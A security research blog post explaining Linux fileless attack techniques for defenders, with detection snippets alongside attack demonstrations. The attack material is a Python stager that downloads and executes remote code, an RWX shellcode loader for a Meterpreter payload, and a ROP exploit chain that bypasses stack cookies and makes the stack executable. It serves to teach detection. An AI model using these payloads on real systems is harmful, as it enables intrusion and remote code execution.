Fileless (in-memory) threats, binary obfuscation, and living-off-the-land attack techniques are rising in popularity on Windows. However, little is documented about the applicability and means of achieving these techniques for Linux.

This blog will outline what Process Memory Integrity (PMI) is, why it’s valuable in identifying these types of attack techniques, and technical details for how they are executed on Linux.

As a byproduct of this research, Red Canary will be open sourcing a few tools, beginning with Exploit Primitive Playground (EPP), a service that intentionally exposes exploit primitives to help researchers learn how to leverage remote code execution vulnerabilities to execute fileless (in-memory only) payloads.

This is the first installment of a larger blog series. In the future, we will look at PMI through the lens of a defender’s point of view, outlining detection techniques, the unique challenges posed by Linux, and a few discrete examples of how to catch publicly documented toolsets, like Metasploit’s Meterpreter. Stay tuned!

What is Process Memory Integrity (PMI)?

Process Memory Integrity is a series of techniques that help validate the trustworthiness of code executing on a given system. This can be achieved through hashing, runtime code analysis, page flag analysis, monitoring of memory segment permission modifications, code-signing verification, and more.
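Hashing is the simplest of these techniques to illustrate. The sketch below is a minimal, hypothetical example (the helper names `page_hashes` and `modified_pages` are ours, not from any PMI product): it hashes two snapshots of the same executable region page by page, for instance the bytes of a text segment on disk and the bytes currently mapped in memory, and reports which pages differ. It assumes 4 KiB pages and assumes the region has no load-time relocations, which would otherwise produce benign differences.

```python
from __future__ import annotations

import hashlib

PAGE_SIZE = 0x1000  # assumption: 4 KiB pages, the usual x86_64 page size


def page_hashes(data: bytes, page_size: int = PAGE_SIZE) -> list[str]:
    """Return a SHA-256 hex digest for each page-sized chunk of `data`."""
    return [
        hashlib.sha256(data[off:off + page_size]).hexdigest()
        for off in range(0, len(data), page_size)
    ]


def modified_pages(baseline: bytes, observed: bytes, page_size: int = PAGE_SIZE) -> list[int]:
    """Return indices of pages that differ between two snapshots of one region."""
    base = page_hashes(baseline, page_size)
    seen = page_hashes(observed, page_size)
    changed = [i for i, (a, b) in enumerate(zip(base, seen)) if a != b]
    # Pages that exist in only one snapshot (the region changed size) also count.
    changed.extend(range(min(len(base), len(seen)), max(len(base), len(seen))))
    return changed


# Simulate a one-byte patch (e.g. an inline hook) in the second page of a region.
original = bytes(3 * PAGE_SIZE)
patched = bytearray(original)
patched[PAGE_SIZE + 10] = 0xC3
print(modified_pages(original, bytes(patched)))  # [1]
```

Hashing per page rather than per region keeps the result actionable: it points at where the code changed, not just that it changed.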

What type of threats and techniques can PMI find?

Binary compression and obfuscation: Attackers can utilize packers, like the Ultimate Packer for eXecutables (UPX), to compress and obfuscate executable binary contents. This changes the actual bytes of the application on disk, and thus alters the size, file metadata, and more. By analyzing the integrity and contents of what the CPU actually executes—e.g., executable memory pages—most obfuscators, packers, and encoders are easily defeated.

Just-in-time (JIT) applications: Python, Ruby, PowerShell, and Java are interpreted or just-in-time compiled runtimes that convert source code into bytecode at execution time. Since source code can be piped directly into these applications (or placed in a file with few requirements on file extension or headers), this code can be difficult to identify and analyze. Attackers will commonly use these “native” applications instead of building an implant that has to account for architecture, distribution, and kernel version.
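To illustrate how little an interpreter needs from the filesystem, the following sketch feeds a Python program to a child interpreter over standard input. The `-` argument tells Python to read its program from stdin, so the child’s command line contains no script path and no script file is created. The program itself is a harmless placeholder.

```python
import subprocess
import sys

# A harmless placeholder program; it exists only in memory and in the pipe.
source = b"import os\nprint(os.getpid() > 0)\n"

# "-" makes the child interpreter read its program from stdin, so its command
# line holds no script path and no script file is created.
result = subprocess.run([sys.executable, "-"], input=source, capture_output=True, check=True)
print(result.stdout.decode().strip())  # True
```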

Remote code execution: When a remote code execution vulnerability exists, the conditions arise for an attacker to place code into the memory pages belonging to the vulnerable process. Once control flow is altered, the untrusted, malicious code is executed—without any file modifications or invocation of new processes. As an example, imagine the adversary supplying and executing Position Independent Code (shellcode) instead of executing a command via a shell.

Code injection: Adversaries are able to inject untrusted, malicious code into already running, “trusted” processes by leveraging mechanisms used by debuggers like the GNU Debugger (GDB). The backing file on disk no longer reflects the code that is actually being run.

Dynamic code: Sophisticated adversaries will commonly have a “stager” implant, with minimal functionality, that dynamically fetches additional plugins or code from a remote source. Once obtained, the code is placed into a newly allocated memory region, marked as executable, and run, without anything touching the disk. JIT runtimes, such as the Java Virtual Machine, do this legitimately.
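Newly allocated executable memory is visible to defenders in `/proc/<pid>/maps`. The sketch below parses that format and flags executable regions that are either anonymous (no backing file) or simultaneously writable and executable. It is a simplified heuristic, not a complete detector: legitimate JIT runtimes will trigger it too, and the sample text (including the `/usr/bin/epp` path) is made up for illustration.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Mapping:
    start: int
    end: int
    perms: str  # e.g. "r-xp"
    path: str   # backing file, a pseudo-name such as "[stack]", or "" if anonymous


def parse_maps(text: str) -> list[Mapping]:
    """Parse /proc/<pid>/maps content: start-end perms offset dev inode [path]."""
    mappings = []
    for line in text.splitlines():
        fields = line.split(maxsplit=5)
        if len(fields) < 5:
            continue
        start, end = (int(x, 16) for x in fields[0].split("-"))
        path = fields[5].strip() if len(fields) == 6 else ""
        mappings.append(Mapping(start, end, fields[1], path))
    return mappings


def suspicious_exec_regions(mappings: list[Mapping]) -> list[Mapping]:
    """Flag executable regions that are anonymous or writable and executable."""
    return [
        m for m in mappings
        if "x" in m.perms and (m.path == "" or "w" in m.perms)
    ]


sample = """\
55d0c8a00000-55d0c8a01000 r-xp 00001000 08:01 1234       /usr/bin/epp
7f3a1c000000-7f3a1c001000 rwxp 00000000 00:00 0
7ffd5e1f0000-7ffd5e211000 rw-p 00000000 00:00 0          [stack]
7ffd5e3f8000-7ffd5e3fa000 r-xp 00000000 00:00 0          [vdso]
"""

for m in suspicious_exec_regions(parse_maps(sample)):
    print(hex(m.start), m.perms, m.path or "<anonymous>")
```

On a live system, the same functions can be pointed at the contents of `/proc/<pid>/maps` for any process you are allowed to inspect.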

Known malicious or suspicious code: Malware will commonly make use of open source code or build on existing components that have been exposed in the public domain. For example, XMRig, distorm, and other projects are often utilized by adversaries. In many cases, these libraries or projects are unexpected in a production cloud environment.

Code patching/hooking: Adversaries will use hooking/patching to alter program behavior, capture information, and/or hide information. Typically, this is achieved through code injection (in memory). However, the operation can be performed against binary contents on disk as well.

PMI technique #1: binary compression and obfuscation

There are many ways of compressing and obfuscating binaries:

- Traditional packers, like UPX, will take an existing executable, compress, encrypt, or transform it, and embed it into a new executable. At runtime, they decompress/decrypt/transform it back into the original binary and manually load it into memory, often implementing their own dynamic linker.

- Toolchain obfuscators (e.g., llvm-obfuscator, gobfuscate, etc.) act on the source code itself, transforming the binary at compile time. While powerful, these tools produce binaries that have shared “watermarks” that are distinct and lend themselves to detection.

- Dynamic stagers don’t contain a payload and instead contain logic to dynamically download and execute it. Various forms of these exist; some will write the payload to disk, others will load it manually in memory.
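Compressed or encrypted payloads, like those embedded by traditional packers, tend to look statistically random. A common triage heuristic, sketched below, is to measure the Shannon entropy of a file or section in bits per byte: values close to 8.0 suggest compression or encryption. This is only a heuristic (it says nothing about toolchain obfuscators, and any threshold you choose is a tunable assumption), which is why inspecting what actually executes in memory is more reliable.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of `data` in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return sum(-(n / total) * math.log2(n / total) for n in Counter(data).values())


print(shannon_entropy(b"\x00" * 1024))     # 0.0: a single repeated byte
print(shannon_entropy(bytes(range(256))))  # 8.0: every byte value exactly once
```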

PMI technique #2: fileless remote command execution

We consider an attack “fileless” when nothing is written to a persistent medium (i.e., disk). This does not, however, mean that existing executables cannot be used to expand execution.

To best demonstrate modern Linux attack techniques, we created Exploit Primitive Playground (EPP). EPP intentionally exposes common exploit primitives, like remote command execution, stack out-of-bounds read/write (R/W), arbitrary memory R/W, and more, to allow security researchers to easily demonstrate simple and complex Linux attack techniques, including fileless (in-memory only) exploitation and code execution.

Remote command execution attacks allow an adversary to run an arbitrary shell command. Implicitly, this means the command must be understood by the system and have an associated program or binary. As a result, the adversary has to “live off the land” and misuse an existing program or binary in order to invoke or execute their desired code.

Adversaries will commonly use wget/curl to fetch a malicious application, and then use a shell like /bin/sh for execution. There are many other living-off-the-land options.

Here is an example that uses Python:

```sh
python -c 'exec("import socket as so;s=so.socket(so.AF_INET,so.SOCK_STREAM);s.connect((\"127.0.1.1\",12345));s2=b\"\";\nwhile (1024-len(s2))>0:\n s2+=s.recv(1024-len(s2))\ns.shutdown(so.SHUT_RDWR);s.close();exec(s2);")'
```

To better understand this attack, let’s look at the Python code in a more readable form:

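```python
import socket as so

s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect(ATTACK_PLATFORM_ADDRESS)  # (host, port) tuple of the attacker's server

s2 = b""
while (PAYLOAD_SIZE - len(s2)) > 0:
    s2 += s.recv(PAYLOAD_SIZE - len(s2))  # append; recv() may return a partial chunk

s.shutdown(so.SHUT_RDWR)
s.close()

exec(s2)  # run the downloaded second-stage Python code in memory
```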

This is a “stager,” a term commonly used to describe a small stub that has the following traits:

- Intended to facilitate adversary operations by obtaining additional code or modules from an adversary-controlled source. This ensures intent and capabilities are not exposed until the adversary has vetted the target and is ready to act on directives. This minimizes exposure and risk and also allows adversaries to quickly burn/turn/create new stagers, with minimal investment and minimal fingerprints, as shared code is often not required.

- Minimally invasive, usually a small amount of code, and intended to run on a broad set of target platforms and distributions.

This Python script connects to a server via connect, downloads additional Python code via recv, and dynamically executes that code with exec.
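The receive loop in this stager is an instance of the generic “read exactly N bytes” pattern: recv() may return fewer bytes than requested, so each chunk must be appended to what has already arrived. The sketch below shows that pattern on its own, as a hypothetical helper `recv_exact`, and also handles a case the one-liner ignores: a peer that closes the connection early, where recv() returns an empty bytes object and the stager’s loop would spin forever.

```python
import socket


def recv_exact(sock: socket.socket, size: int) -> bytes:
    """Read exactly `size` bytes from `sock`, appending each partial chunk."""
    buf = b""
    while len(buf) < size:
        chunk = sock.recv(size - len(buf))
        if not chunk:  # empty result: the peer closed the connection
            raise ConnectionError(f"expected {size} bytes, received {len(buf)}")
        buf += chunk
    return buf


# Demonstration over a local socket pair instead of a network connection.
left, right = socket.socketpair()
right.sendall(b"hello world")
print(recv_exact(left, 5), recv_exact(left, 6))  # b'hello' b' world'
left.close()
right.close()
```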

The server in this example will respond with the following additional Python code, which is a Metasploit Meterpreter shell:

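```python
from mmap import *
from ctypes import *

sc = b'\xC9...'  # raw shellcode bytes (truncated)
# Anonymous, private mapping that is readable, writable, and executable.
m = mmap(-1, len(sc), MAP_PRIVATE | MAP_ANONYMOUS, PROT_WRITE | PROT_READ | PROT_EXEC)
m.write(sc)
# Treat the start of the mapping as a C function pointer and call it.
cast(addressof(c_char.from_buffer(m)), CFUNCTYPE(c_void_p))()
```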

The raw shellcode is encoded as a string, written to memory, and then executed as a C function using Python’s built-in ctypes. None of this code will have been written to disk, and the adversary will then achieve full remote code execution via command injection.

Check out the source in our public repository.

PMI technique #3: fileless remote code execution

Remote code execution attacks grant an adversary immediate code execution within the context of the vulnerable process. Since the introduction of hardware-, OS-, and toolchain-based protection mechanisms, such as NX, ASLR, and stack protection, these attacks have become more difficult to perform.

In order to bypass these protections, a threat actor needs multiple exploit primitives (which typically means chaining more than one exploit). In our example, we will use three primitives (a stack out-of-bounds read, a stack out-of-bounds write, and an arbitrary read) to gain full code execution in memory.



First, we need to leak some addresses in order to create a Return-Oriented Programming (ROP) chain. Our stack out-of-bounds read allows us to specify a size and direction (underflow or overflow). Those bytes are then read relative to the buffer being attacked and returned to us. In EPP, we can perform an overflow read, which will leak the saved frame pointer, the return address, and the stack cookie.

Stack cookies (also called stack canaries) are random values that are generated at program start, placed on the stack when each protected function is entered, and verified before the function returns. An out-of-bounds write will corrupt the stack cookie, which will be detected before the function returns, and the C library (via __stack_chk_fail) will abort the process. So it’s important for us to write the correct value back during the exploit.
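Once the out-of-bounds read returns its bytes, the leaked values have to be decoded. The sketch below assumes the common x86_64 GCC layout in which the cookie, the saved frame pointer, and the return address sit directly after the vulnerable buffer as little-endian 8-byte values; real binaries may insert padding or other saved registers, so the offset is something to confirm in a disassembler. `StackFrame` and `parse_leak` are hypothetical names, not taken from the EPP source, and the leak itself is made up.

```python
import struct
from typing import NamedTuple


class StackFrame(NamedTuple):
    cookie: int          # stack canary that must be written back unchanged
    frame_pointer: int   # caller's saved RBP
    return_address: int  # saved RIP, points into the loaded executable


def parse_leak(leak: bytes, buffer_size: int) -> StackFrame:
    """Decode the three qwords that follow a `buffer_size`-byte stack buffer.

    Assumes the layout [buffer][cookie][saved RBP][return address] with no padding.
    """
    return StackFrame(*struct.unpack_from("<QQQ", leak, buffer_size))


# Made-up leak: 16 bytes of buffer followed by the three qwords.
leak = b"A" * 16 + struct.pack("<QQQ", 0x1122334455667700, 0x7FFD5E210A40, 0x7FFAB102A124)
frame = parse_leak(leak, 16)
print(hex(frame.return_address))  # 0x7ffab102a124
```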

The return address provides a pointer into a loaded Executable and Linkable Format (ELF) file. If the binary is dynamically linked (and EPP is), this can be used to find symbols within the standard C library (libc) by parsing the ELF structures that are still in memory. Take caution, because only some of these structures are mapped at runtime: the section headers usually are not, but the program headers are, and they locate the dynamic section. This section describes the module’s dependencies (shared objects) and points to the dynamic symbol table, its string table, and a hash table (DT_HASH or DT_GNU_HASH) that lets the dynamic linker resolve symbols efficiently, for example for dlsym. Instead of scanning every symbol name, we can hash the name of the symbol we want and use the hash table to jump straight to the matching candidates.
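The hash functions themselves are short. The sketch below implements the two hashes a dynamic linker uses for symbol lookup: the classic System V ELF hash used by `DT_HASH` tables, and the GNU hash (Bernstein’s `h * 33 + c`, truncated to 32 bits) used by `DT_GNU_HASH` tables. In a full lookup, the hash selects a bucket and the candidate’s name from the dynamic string table is then compared to confirm the match. This is our own illustration, not DynELF’s code.

```python
def gnu_hash(name: bytes) -> int:
    """Hash used by DT_GNU_HASH tables: h = h * 33 + c, starting from 5381."""
    h = 5381
    for c in name:
        h = (h * 33 + c) & 0xFFFFFFFF
    return h


def sysv_hash(name: bytes) -> int:
    """Hash used by classic DT_HASH tables (the System V ABI ELF hash)."""
    h = 0
    for c in name:
        h = ((h << 4) + c) & 0xFFFFFFFF
        g = h & 0xF0000000
        if g:
            h ^= g >> 24
        h &= ~g & 0xFFFFFFFF  # clear the top nibble
    return h


print(hex(gnu_hash(b"printf")), hex(sysv_hash(b"printf")))  # 0x156b2bb8 0x77905a6
```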

Thankfully, a library exists to aid us in this venture: DynELF, from pwntools. This class leverages this knowledge to provide you with the addresses of functions in a remote process. But we need to give it the base address of the loaded EPP process as well as a means to perform an arbitrary read. This brings us to the second exploit primitive we need. EPP provides an arbitrary read that lets the adversary specify both an address and a size. That small region is then returned to the threat actor. Real arbitrary read primitives typically don’t let you specify a size; rather, the size is fixed (most commonly 1, 4, or 8 bytes), as they often involve mishandling of a pointer value that’s dereferenced. That’s of little consequence, though, because either can be used to create an arbitrary-length read. It just becomes a matter of how many times you need to perform the exploit to get the desired amount of data.
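Turning a fixed-size read into an arbitrary-length one is just a loop. In the sketch below, `read8` stands in for a hypothetical primitive that returns exactly 8 bytes from a given address (each call would be one trigger of the vulnerability); the fake memory and base address exist only to make the example runnable.

```python
from typing import Callable


def read_arbitrary(read8: Callable[[int], bytes], address: int, size: int) -> bytes:
    """Build an arbitrary-length read out of a fixed 8-byte read primitive."""
    out = bytearray()
    for offset in range(0, size, 8):
        out += read8(address + offset)  # one use of the primitive per 8 bytes
    return bytes(out[:size])  # trim bytes over-read by the final call


# Simulated target memory for the example: 64 bytes mapped at 0x1000.
BASE = 0x1000
MEMORY = bytes(range(64))
calls = []


def fake_read8(addr: int) -> bytes:
    calls.append(addr)
    offset = addr - BASE
    return MEMORY[offset:offset + 8]


data = read_arbitrary(fake_read8, BASE + 3, 10)
print(data.hex(), len(calls))  # 030405060708090a0b0c 2
```

The number of primitive invocations grows with the requested size divided by the primitive’s width, which is the “how many times you need to perform the exploit” cost described above.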

In order to use DynELF, we need to find the start address of EPP in memory. Dynamic linkers (and the kernel, for the main executable) map file-backed segments at page-aligned addresses (0x1000 bytes on x86_64). Every ELF file begins with the magic bytes \x7FELF, and that header sits at the start of the module’s first mapped page. Knowing this, we can clear the least significant 12 bits (the last three hex digits) of the return address (0x7FFAB102A124 becomes 0x7FFAB102A000). Now we have an address that’s located on a page boundary.

Walking backwards one page at a time, our arbitrary read checks the first 4 bytes of each page until we find the ELF magic (\x7FELF). When we find it, that’s the base address of the EPP executable in memory.

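```python
# Round the leaked return address down to its page boundary.
epp_ba = stack_frame.return_address & ~0xFFF
while True:
    # Read the first 4 bytes of the page via the arbitrary-read primitive.
    page_prefix = a_read(s, epp_ba, 4)
    if page_prefix == b"\x7fELF":
        logging.info("epp base address: 0x{:X}".format(epp_ba))
        break
    epp_ba -= 0x1000  # walk backwards one page
```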

With DynELF, we can now look up the address of mprotect, which we will use to change the stack’s permissions to allow execution of code. Now we can start building a ROP chain. Because the x86_64 Linux calling convention passes the first six integer or pointer arguments of any function in registers (RDI, RSI, RDX, RCX, R8, and R9), we can’t simply place raw arguments and a function address on the stack as we could on 32-bit x86. Instead, we need to locate gadgets that set up the registers correctly before invoking mprotect. A ROP gadget is a short sequence of instructions that performs a specific action and then returns.

Here are a few examples:

```asm
rop_pop_rax:  pop rax
              ret
rop_pop_rdi:  pop rdi
              ret
rop_pop_rdx:  pop rdx
              ret
rop_pop_rcx:  pop rcx
              ret
rop_pop_r8:   pop r8
              ret
rop_pop_r9:   pop r9
              ret
```

These can be found anywhere in executable memory. In our example, we will use the ROP gadgets that are present in EPP itself, but you could also search for them in libc or other loaded modules. Pwntools provides some help in this area too, with the ELF and ROP classes.
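At its core, gadget discovery is a byte search over executable memory. The sketch below looks for the x86_64 `pop <reg>` opcodes followed by `ret` (0xC3); the table covers the registers from the examples above plus RSI, while tools such as the pwntools ROP class or ROPgadget find far more (and longer) gadgets. Because x86 instructions can be decoded from any byte offset, a gadget may hide inside another instruction, as the made-up code bytes in the usage example show.

```python
from __future__ import annotations

# x86_64 encodings of "pop <reg>; ret" gadgets.
GADGET_BYTES = {
    "pop rax; ret": b"\x58\xc3",
    "pop rcx; ret": b"\x59\xc3",
    "pop rdx; ret": b"\x5a\xc3",
    "pop rsi; ret": b"\x5e\xc3",
    "pop rdi; ret": b"\x5f\xc3",
    "pop r8; ret": b"\x41\x58\xc3",
    "pop r9; ret": b"\x41\x59\xc3",
}


def find_gadgets(code: bytes, base: int) -> dict[str, int]:
    """Return the address of the first match for each gadget.

    `code` is the contents of an executable segment mapped at `base`.
    """
    found = {}
    for name, pattern in GADGET_BYTES.items():
        offset = code.find(pattern)
        if offset != -1:
            found[name] = base + offset
    return found


# Made-up segment bytes: nop, nop, pop rdi; ret, nop, pop r9; ret.
# Decoding "pop r9; ret" (41 59 c3) one byte later yields "pop rcx; ret".
code = b"\x90\x90\x5f\xc3\x90\x41\x59\xc3"
for name, addr in find_gadgets(code, 0x400000).items():
    print(f"{name:13} 0x{addr:x}")
```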

With our third and final primitive, the stack out of bounds write, we can now create a stack frame that grants us execution. Here’s what the ROP technique will look like:

When the function that performs the stack out-of-bounds write returns, it doesn’t return to its caller; it returns to our first gadget. This begins setting up our call to mprotect by popping the value 0x2000 off the stack and into the RSI register (the length argument). Next is the RDX gadget, which loads the page permissions we want (PROT_READ|PROT_WRITE|PROT_EXEC), and finally the RDI gadget, which loads the address we want to apply the new permissions to: the stack itself, rounded down to a page boundary. We specified two pages (0x2000) in case our shellcode straddles a page boundary. mprotect is invoked when our last gadget returns and changes the stack permissions to allow execution. When mprotect returns, it pops the next value off the stack as its return address, which points to our shellcode, and we are now executing it.
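The chain described above can be laid out with `struct`. This is a sketch under stated assumptions: every address passed in is a made-up placeholder for a value recovered in the earlier steps (gadget addresses, mprotect from DynELF, the leaked stack location), and the function only builds the part of the payload that starts at the saved return address; the filler, cookie, and saved frame pointer that precede it are omitted. `build_mprotect_chain` is a hypothetical helper, not part of EPP.

```python
import struct

PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4  # values from <sys/mman.h> on Linux


def build_mprotect_chain(pop_rsi: int, pop_rdx: int, pop_rdi: int, mprotect: int,
                         stack_page: int, shellcode_addr: int) -> bytes:
    """Return the chain as little-endian qwords, in the order they are consumed."""
    qwords = [
        pop_rsi, 0x2000,                              # RSI = length: two pages
        pop_rdx, PROT_READ | PROT_WRITE | PROT_EXEC,  # RDX = protections (7)
        pop_rdi, stack_page,                          # RDI = page-aligned stack address
        mprotect,                                     # mprotect(RDI, RSI, RDX)
        shellcode_addr,                               # mprotect's ret jumps here
    ]
    return b"".join(struct.pack("<Q", q) for q in qwords)


chain = build_mprotect_chain(
    pop_rsi=0x401001, pop_rdx=0x401002, pop_rdi=0x401003,  # made-up gadget addresses
    mprotect=0x7F0000012340,                               # made-up libc address
    stack_page=0x7FFD5E210A40 & ~0xFFF,                    # mprotect needs page alignment
    shellcode_addr=0x7FFD5E210A80,                         # made-up shellcode location
)
print(len(chain))  # 64
```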

“Shellcode” is an overloaded term, with an implication that a shell will be launched. What we really mean is position-independent code (PIC). PIC is architecture dependent, meaning it’s written in architecture-specific assembly mnemonics and turned into machine code via an assembler. It makes no assumptions about where in memory it is loaded and is entirely self-contained. The shellcode used in this attack is a very small stager that reaches out to another server to download another, larger shellcode blob and then executes it. This doesn’t have to be the case in a real attack. If enough space is initially available to the adversary, the entire payload may be delivered during initial exploitation.

Linux shellcode is relatively simple to create and maintain, thanks to the kernel’s stable system call interface, the same property that makes fully static binaries possible. All syscall numbers are defined statically (per architecture), i.e., the same number is used for open on all x86_64 devices on the planet, and in space (although those are likely x86). This looks different on Windows, where statically compiled binaries are not supported and syscall numbers can change across minor releases. There is no complicated contract about segment registers containing pointers to specific data structures. The design is particularly elegant from an implant developer’s perspective.
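Because the numbers are part of the kernel’s per-architecture ABI, they can be hard-coded. The sketch below keeps a deliberately tiny table for x86_64 and aarch64 and calls getpid by number through libc’s generic `syscall()` wrapper via ctypes. Shellcode uses the same number, placing it in a register before executing the `syscall` (x86_64) or `svc #0` (aarch64) instruction directly; the kernel’s own syscall tables remain the authoritative source.

```python
import ctypes
import os
import platform

# A few per-architecture syscall numbers from the Linux kernel ABI.
SYSCALLS = {
    "x86_64": {"write": 1, "mmap": 9, "mprotect": 10, "getpid": 39},
    "aarch64": {"write": 64, "mmap": 222, "mprotect": 226, "getpid": 172},
}

# CDLL(None) exposes symbols already loaded into this process, including libc.
libc = ctypes.CDLL(None, use_errno=True)
libc.syscall.restype = ctypes.c_long


def raw_getpid() -> int:
    """Invoke getpid by number through libc's generic syscall() wrapper."""
    number = SYSCALLS[platform.machine()]["getpid"]
    return libc.syscall(ctypes.c_long(number))


if platform.machine() in SYSCALLS:
    print(raw_getpid() == os.getpid())  # True
```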

Unlike the remote command execution attack, this attack doesn’t need to create a process to continue execution. It may not even need to make a new network connection, if the adversary is able to deploy its full payload into memory during exploitation.

Check out the source in our public repository.

PMI technique #4: known malicious or suspicious code

Depending upon the system, environment, industry vertical, and company culture, code can be benign, suspect, or definitively malicious. As an example, unless you’re in the fintech market, it’s highly suspect and likely malicious if a production cloud workload is mining bitcoin.

Here are a few other red flags to look out for:

- Disassembler projects (capstone, distorm): These can be used to facilitate hooking, but also serve legitimate purposes in debugging and binary analysis tools.

- Statically linked TLS libraries (mbedtls, wolfSSL, etc.): These are lightweight (in comparison to OpenSSL) and can be used by legitimate applications, but they are also frequently used by malware due to their size and ease of use.

- Packet capture software (libpcap, PF_RING, etc.): Commonly used by production engineering and DevOps teams to diagnose latency or connectivity issues; however, it is also used for port-knocking backdoors and for intercepting data on the wire.

- Traffic redirection or routing software (Tor, proxychains, torsocks): Can be used by developers to debug or access web services; however, these tools are also used for lateral movement, bypassing firewall/NAT restrictions, and man-in-the-middle (MitM) attacks.

- Password cracking and brute-forcing tools (John the Ripper, hydra): Very infrequently used by businesses for employees who have forgotten a password, but commonly used by adversaries to escalate privileges and to assume identities.
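A crude first pass at spotting this kind of code is a string search over file contents or dumped process memory. The marker strings below are illustrative assumptions, not vetted signatures; real detection would rely on curated rules (for example, YARA) and on context about what is expected in the environment. The sample bytes are made up.

```python
from __future__ import annotations

# Illustrative marker strings (assumptions, not vetted detection signatures).
MARKERS = {
    "XMRig (cryptominer)": b"xmrig",
    "mbed TLS (TLS library)": b"mbed tls",
    "wolfSSL (TLS library)": b"wolfssl",
    "capstone (disassembler)": b"capstone",
    "libpcap (packet capture)": b"libpcap",
}


def find_markers(data: bytes, markers: dict[str, bytes] = MARKERS) -> list[str]:
    """Return labels of markers present in `data`, ignoring ASCII case."""
    lowered = data.lower()
    return [label for label, marker in markers.items() if marker in lowered]


sample = b"\x7fELF\x02\x01\x01 XMRig miner \x00 wolfSSL error \x00"
print(find_markers(sample))  # ['XMRig (cryptominer)', 'wolfSSL (TLS library)']
```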

PMI technique #5: code patching / injection / hooking

Adversaries commonly need to influence the behavior of other processes, whether it’s to hide, capture, or change behavior. This requires code be executed in the target process’s context.

On Linux, there is no direct equivalent to CreateRemoteThread. The kernel does support a process tracing API (ptrace) that can be used to accomplish this, but that approach is well documented and readily detectable.
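Part of what makes ptrace detectable is that, while a process is being traced (by GDB or by an injector built on ptrace), the kernel reports the tracer’s PID in the `TracerPid` field of `/proc/<pid>/status`. The sketch below parses that field from the file’s contents; polling it is only a rough check, since a brief attach and detach can fall between polls. The status text in the example is made up.

```python
def tracer_pid(status_text: str) -> int:
    """Return TracerPid from /proc/<pid>/status content (0 means not traced)."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1])  # int() tolerates the surrounding whitespace
    raise ValueError("no TracerPid field found")


example = "Name:\tepp\nState:\tt (tracing stop)\nTracerPid:\t4242\n"
print(tracer_pid(example))  # 4242
```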

Several dynamic linker implementations support an environment variable called LD_PRELOAD, which is simply a list of paths to shared objects. When the dynamic linker loads a program, it loads these shared objects into the process before its main function is invoked. This provides a means of injecting code. However, it requires the targeted process to be restarted. The technique is also highly visible, since the variable is part of the process environment, and coarse-grained, since it applies to every dynamically linked program started with that environment. Another downside is that the injected payload needs to be written to the filesystem. This technique has no effect on statically linked executables.

Lastly, an adversary can write a shared object with the same name as a legitimate dependency to a directory listed in the LD_LIBRARY_PATH environment variable. When the dynamic linker resolves dependencies, it loads whichever matching library it finds first in the directory list. This technique has similar constraints to LD_PRELOAD.
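Both variables are recorded in the target’s environment, which Linux exposes in `/proc/<pid>/environ` as NUL-separated `KEY=VALUE` entries. The sketch below extracts them from raw file contents. Note its limits: the file reflects the environment the process started with (a process can overwrite that memory), and it does not cover the system-wide `/etc/ld.so.preload` file. The sample library path is hypothetical.

```python
from __future__ import annotations

LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}


def loader_env(environ: bytes) -> dict[str, str]:
    """Return dynamic-linker variables found in raw /proc/<pid>/environ bytes."""
    found = {}
    for entry in environ.split(b"\0"):
        key, sep, value = entry.partition(b"=")
        name = key.decode(errors="replace")
        if sep and name in LOADER_VARS:
            found[name] = value.decode(errors="replace")
    return found


raw = b"PATH=/usr/bin\0LD_PRELOAD=/tmp/libhook.so\0HOME=/root\0"
print(loader_env(raw))  # {'LD_PRELOAD': '/tmp/libhook.so'}
```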

We’ll soon be introducing a tool that implements these techniques as well as a new approach that doesn’t use path injection, LD_PRELOAD, or ptrace.

In the next blog post, we are going to talk about how we use Process Memory Integrity to catch Meterpreter shells generically, regardless of platform, language, or encoding.